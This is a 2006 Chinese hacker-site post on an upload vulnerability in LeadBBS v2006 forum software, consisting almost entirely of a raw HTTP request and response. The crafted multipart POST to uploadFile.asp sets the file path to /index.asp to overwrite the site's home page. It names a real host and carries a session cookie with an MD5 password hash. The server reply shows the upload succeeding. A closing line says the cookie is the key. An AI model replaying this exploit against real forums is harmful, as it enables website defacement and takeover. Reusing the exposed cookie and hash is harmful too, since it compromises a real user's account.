首 页文章中心黑客工具黑吧学院技术论坛安全培训免费频道最近更新瑞星在线杀毒黑吧百度繁體中文
  设为首页
加入收藏
发布作品
   
栏目导航
· 漏洞利用 · 脚本注入
· 入侵实例 · 编程代码
· 逆向工程
热门文章
· 如何封别人QQ
· 充QQ币的疯狂——宽...
· 免费得QB
· 400秒远程攻破你的Q...
· [图文] QQ免费建400个群
· [组图] 给你一台永远不关机...
· [注意] QQ宠物砸蛋秘诀
· 再次有机会免费获得...
· 想的挂QQvip的进
· 在QQ中将自己从对方...
相关文章
· 旁注 挑战国内最权威...
· 获得leadbbs论坛站w...
· 获得leadbbs论坛站w...
· 关于BBSxp/LeadBBS的...
· 一次利用leadbbsCoo...
· 关于leadbbs论坛的C...
LeadBBS v2006 上传漏洞研究
作者:佚名  来源:www.hack58.com  发布时间:2006-4-9 14:09:37  发布人:黑客动画吧

减小字体 增大字体

 
POST /User/uploadFile.asp?submitflag=yes HTTP/1.1
Content-Type: multipart/form-data; boundary=@#$gxgl
Referer: http://webidc.vicp.net/User/uploadFile.asp?submitflag=yes
Host: webidc.vicp.net
Content-Length: 345
Cookie: ASPSESSIONIDQQCDQQAQ=OFNPJGMBGGBDEEOJMLGJEMMC; x86AtBD=0; x86Time=2006%2D3%2D18+18%3A50%3A23; cnzz02=0; rtime=0; ltime=1142679153378; cnzz_eid=56351174-; x86=pass=e10adc3949ba59abbe56e057f20f883e&user=%C2%B7%B9%FD

@#$--gxgl
Content-Disposition: form-data; name="filepath"

/index.asp


HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 18 Mar 2006 11:23:38 GMT
X-Powered-By: ASP.NET
Content-Length: 1484
Content-Type: text/html
Set-Cookie: x86Time=2006%2D3%2D18+19%3A23%3A39; path=/
Cache-control: private


<script language=javascript>
<!--

   function addcontent(tmpstr,GBL_Width,GBL_Height)
   {
       parent.document.LeadBBSFm.Form_FaceUrl.value = tmpstr;
       parent.document.LeadBBSFm.Form_FaceWidth.value = GBL_Width;
       parent.document.LeadBBSFm.Form_FaceHeight.value = GBL_Height;
       parent.document.faceimg.src=tmpstr;
       parent.document.faceimg.width=GBL_Width;
       parent.document.faceimg.height=GBL_Height;
   }

//-->
</script>

<html>
<head>
   
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=gb2312">
   <meta http-equiv="Content-Language" content="zh-cn">
   <META name="description" content="LeadBBS论坛,ASP论坛,计数器,统计系统,dotNet,asp.Net,源代码下载,组件,免费代码,ASP,数据库,SQL,文章,入门,ASP精品屋">
   <title>
         
   </title>
   <link rel="stylesheet" type="text/css" href="../inc/style7.css">
   <style>
   <!--
       .l {FONT-FAMILY: 宋体; FONT-SIZE: 12px;}
       table {WORD-BREAK: break-all;}
   -->
   </style>
</head>

   <script language=javascript>
       function ctlent()
       {
           if(window.event.keyCode==27)
           {window.close();}
       }
   </script>
   <body onkeydown="ctlent();" class=TBBG9>
   
<body bgcolor=#f7f7f7 leftmargin="0" topmargin="0">

   <script language=javascript>
   <!--
   alert("非图像文件,上传错误!");

   //-->
   </script>
   <img src=../images/null.gif width=2 height=5><br> 文件上传成功,要<a href=uploadFile.asp>继续上传请点这里</a>
   <img sc=../images/blank.gif height=6 width=1><br><a href=uploadFile.asp></a>
</body>
</html>


http://XXXX/User/uploadFile.asp?submitflag=yes
Cookie
是关键
[ ] [返回上一页] [打 印] [收 藏]
上一篇文章:PHP安全配置
 
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 网站导航 - 作品发布
互联网备案登记:粤ICP备05008775号
友情提示:浏览本站,请使用IE6.0浏览,并将分辩率设置为1024*768 为佳
Copyright © 2002-2005 Hack58.Com. All Rights Reserved .